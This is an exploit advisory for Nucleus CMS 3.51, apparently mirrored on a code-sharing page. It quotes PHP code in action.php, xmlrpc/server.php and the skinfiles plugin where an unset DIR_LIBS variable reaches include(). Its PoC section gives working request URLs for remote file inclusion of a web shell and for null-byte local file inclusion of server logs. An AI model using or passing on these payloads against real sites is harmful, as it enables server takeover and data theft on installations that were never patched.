扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 |
######################################################## Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability ######################################################## __________ /\_<code>\ /\ \__/\ \__/\ \ \ \ \L\_\_______\ \ \/'\ /\_\_____\ \ ,_\ \ \_____ \ \_\/\ \/\ \/'___\ \ , < \/\ \ /' _ </code>\/'_ <code>\ \ \ \/\ \_ </code>\/'__<code>\ \ \ \/\ \ \_\ \/\ \__/\ \ \</code>\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\__/ \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\ \/_/\/___/\/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/ /\____/ \_/__/ ____________ Author:eidelweiss /\ \__/\ \/\ \/\_\ \ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \_____ _____ ____ \ \ \ \ \ \ \/'__<code>\ \ '__</code>\ \ \__ \/\ '__<code>\/\ '__</code>\/',__\ \ \ \_/ \_\ \/\__/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, <code>\ \ </code>\___x___/\ \____\\ \_,__/\ \_\ \_\ \ ,__/\ \ ,__/\/\____/ '\/__//__/\/____/ \/___/\/_/\/_/\ \ \/\ \ \/\/___/ \ \_\ \ \_\ \/_/\/_/ [+]Software:Nucleus CMS [+]Version: Nucleus v3.51 (Other or lower version may also be affected) [+]License: GNU/GPL (Free Software) [+]Homepage: http://nucleuscms.org/download.php [+]Download: http://prdownloads.sourceforge.net/nucleuscms/nucleus3.51.zip?download ######################################################## [!]Discovered: eidelweiss [!]Contact: eidelweiss[at]cyberservices[dot]com [!]Thank`s: sp3x (securityreason) - r0073r & 0x1D (inj3ct0r) loneferret - Exploits - dookie2000ca (exploit-db) JosS (hack0wn) - g1xx_achmed - [D]eal [C]yber - Syabilla_putri (i miss u so much to) ######################################################## -=[Description]=- Nucleus allows you to easily maintain your own weblog(s) on your own server. It offers a system that is easy to install, but still offers maximum flexibility. (PHP4/MySQL) ######################################################## -=[VUln Code]=- ********************************** [-][path_to_nucleus]/action.php $CONF = array(); require('./config.php'); // common functions include_once($DIR_LIBS . 'ACTION.php'); $action = requestVar('action'); $a =& new ACTION(); $errorInfo = $a->doAction($action); ********************************** [-][path_to_nucleus]/nucleus/xmlrpc/server.php $CONF = array(); require("../../config.php"); // include Nucleus libs and code include($DIR_LIBS . "xmlrpc.inc.php"); include($DIR_LIBS . "xmlrpcs.inc.php"); ********************************** [-][path_to_nucleus]/nucleus/plugins/skinfiles/index.php $strRel = '../../../'; require($strRel . 'config.php'); include($DIR_LIBS . 'PLUGINADMIN.php'); ######################################################## -=[ P0C ]=- Http://127.0.0.1/[path_to_nucleus]/action.php?DIR_LIBS= [inj3ct0r sh3ll] Http://127.0.0.1/[path_to_nucleus]/nucleus/xmlrpc/server.php?DIR_LIBS= [inj3ct0r sh3ll] Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=../../../var/log/httpd/access_log%00 or Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=[lfi]%00 ###############################=[E0F]=################################### |
体验盒子
